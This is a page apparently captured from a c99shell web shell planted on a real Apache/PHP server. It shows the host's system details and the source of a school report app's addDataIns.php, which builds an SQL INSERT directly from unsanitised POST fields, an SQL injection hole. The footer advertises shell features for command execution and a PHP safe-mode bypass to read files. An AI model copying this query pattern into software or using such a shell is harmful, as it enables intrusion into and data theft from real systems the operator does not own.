Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reportEregis111/ drwxr-xr-x |
Viewing file: addDataIns.php (2.1 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <meta charset='tis-620'> <?php include_once("classes/Crud.php"); $crud = new Crud(); $round=$_POST['round']; $strDate = explode("/", $_POST['proDate']); $proDate=($strDate[2]-543)."-".$strDate[1]."-".$strDate[0]." ".date("H:i:s"); $term=$_POST['term']; $academic_year=$_POST['academic_year']; $name=$_POST['name']; $amountj=$_POST['amountj']; $amountnj=$_POST['amountnj']; $reason=$_POST['reason']; $per1=$_POST['per1']; $per2=$_POST['per2']; $per3=$_POST['per3']; $per4=$_POST['per4']; $per5=$_POST['per5']; $per6=$_POST['per6']; $per7=$_POST['per7']; $per8=$_POST['per8']; $per9=$_POST['per9']; $per10=$_POST['per10']; $per11=$_POST['per11']; $per12=$_POST['per12']; $per13=$_POST['per13']; $per14=$_POST['per14']; $per15=$_POST['per15']; $per16=$_POST['per16']; $per17=$_POST['per17']; $per18=$_POST['per18']; $per19=$_POST['per19']; $per20=$_POST['per20']; $s1=$_POST['s1']; $s2=$_POST['s2']; $s3=$_POST['s3']; $s4=$_POST['s4']; $s5=$_POST['s5']; $s6=$_POST['s6']; $s7=$_POST['s7']; $s8=$_POST['s8']; $s9=$_POST['s9']; $s10=$_POST['s10']; $s11=$_POST['s11']; $other=$_POST['other']; $result=$_POST['result']; $problem=$_POST['problem']; $ploblemDetail=$_POST['ploblemDetail']; $probManage=$_POST['probManage']; $probSend=$_POST['probSend']; $userID=$_POST['userID']; $result = $crud->execute("INSERT INTO consulting(id,proDate,term,academic_year,round,amountj,amountnj,per1,per2,per3,per4,per5,per6,per7,per8,per9,per10,per11,per12,per13,per14,per15,per16,per17,per18,per19,per20,reason,s1,s2,s3,s4,s5,s6,s7,s8,s9,s10,s11,other,result,problem,ploblemDetail,probManage,probSend,nameTeacher,userID) VALUES('','$proDate','$term','$academic_year','$round','$amountj','$amountnj','$per1','$per2','$per3','$per4','$per5','$per6','$per7','$per8','$per9','$per10','$per11','$per12','$per13','$per14','$per15','$per16','$per17','$per18','$per19','$per20','$reason','$s1','$s2','$s3','$s4','$s5','$s6','$s7','$s8','$s9','$s10','$s11','$other','$result','$problem','$ploblemDetail','$probManage','$probSend','$name','$userID')"); ?> <div align="center"> <img src="img/T1.png"> </div> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |